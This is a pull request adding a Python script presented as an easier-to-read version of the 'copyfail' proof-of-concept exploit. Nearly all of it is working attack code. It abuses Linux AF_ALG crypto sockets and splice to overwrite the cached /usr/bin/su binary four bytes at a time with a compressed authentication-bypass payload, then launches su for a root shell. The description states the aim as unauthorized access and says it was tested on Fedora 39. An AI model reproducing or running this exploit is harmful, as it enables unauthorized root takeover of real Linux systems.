### PR TITLE
Unobfuscated version of copyfail PoC

### DIFF
--- a/copy_fail_unobfuscated.py
+++ b/copy_fail_unobfuscated.py
@@ -1,0 +1,77 @@
+#!/usr/bin/env python3
+import os
+import zlib
+import socket
+
+# Helper function to convert hex strings to byte objects
+def hex_to_bytes(hex_str):
+    return bytes.fromhex(hex_str)
+
+def inject_data(target_file, offset, payload_chunk):
+    """
+    Attempts to overwrite the kernel page cache of a file 
+    using the AF_ALG/splice vulnerability.
+    """
+    # 38 = AF_ALG (Linux Crypto API), 5 = SOCK_SEQPACKET
+    sock = socket.socket(38, 5, 0)
+    
+    # Bind to the AES/SHA256 authenticated encryption engine
+    sock.bind(("aead", "authencesn(hmac(sha256),cbc(aes))"))
+    
+    SOL_ALG = 279  # Socket level for ALG
+    
+    # Set the encryption key and parameters
+    sock.setsockopt(SOL_ALG, 1, hex_to_bytes('0800010000000010' + '0' * 64))
+    sock.setsockopt(SOL_ALG, 5, None, 4)
+    
+    # Accept the session to get a data socket
+    fd_sock, _ = sock.accept()
+    
+    # Calculate write size and prepare control messages
+    write_len = offset + 4
+    null_byte = hex_to_bytes('00')
+    
+    # Send the payload via sendmsg using specific control structures
+    # to trigger the kernel vulnerability
+    fd_sock.sendmsg(
+        [b"A" * 4 + payload_chunk],
+        [
+            (SOL_ALG, 3, null_byte * 4),
+            (SOL_ALG, 2, b'\x10' + null_byte * 19),
+            (SOL_ALG, 4, b'\x08' + null_byte * 3),
+        ],
+        32768
+    )
+    
+    # Create a pipe to facilitate the 'splice'
+    pipe_read, pipe_write = os.pipe()
+    
+    # Use splice to move data from the file into the pipe, 
+    # then from the pipe into the crypto socket.
+    # This is where the 'magic' (the exploit) happens.
+    os.splice(target_file, pipe_write, write_len, offset_src=0)
+    os.splice(pipe_read, fd_sock.fileno(), write_len)
+    
+    try:
+        fd_sock.recv(8 + offset)
+    except:
+        pass
+
+# 1. Open the target binary (read-only)
+target_binary = os.open("/usr/bin/su", os.O_RDONLY)
+
+# 2. Decompress the malicious payload (the code that patches 'su')
+# This payload is tiny machine code to bypass authentication.
+payload = zlib.decompress(hex_to_bytes(
+    "78daab77f57163626464800126063b0610af82c101cc7760c0040e0c160c301d209a154d16999e07e5c1680601086578c0f0ff864c7e568f5e5b7e10f75b9675c44c7e56c3ff593611fcacfa499979fac5190c0c0c0032c310d3"
+))
+
+# 3. Inject the payload into the binary's memory space 4 bytes at a time
+current_offset = 0
+while current_offset < len(payload):
+    inject_data(target_binary, current_offset, payload[current_offset:current_offset+4])
+    current_offset += 4
+
+# 4. Execute the patched 'su' to get a root shell
+print("[+] Exploit complete. Attempting root shell...")
+os.system("su")


### PR DESCRIPTION
Easier to understand version of the original obfuscated exploit.

This script exploits a vulnerability to inject a malicious payload into the 'su' binary, allowing for unauthorized access.

Converted from original copyfail POC by local LLM systems, tested on Fedora 39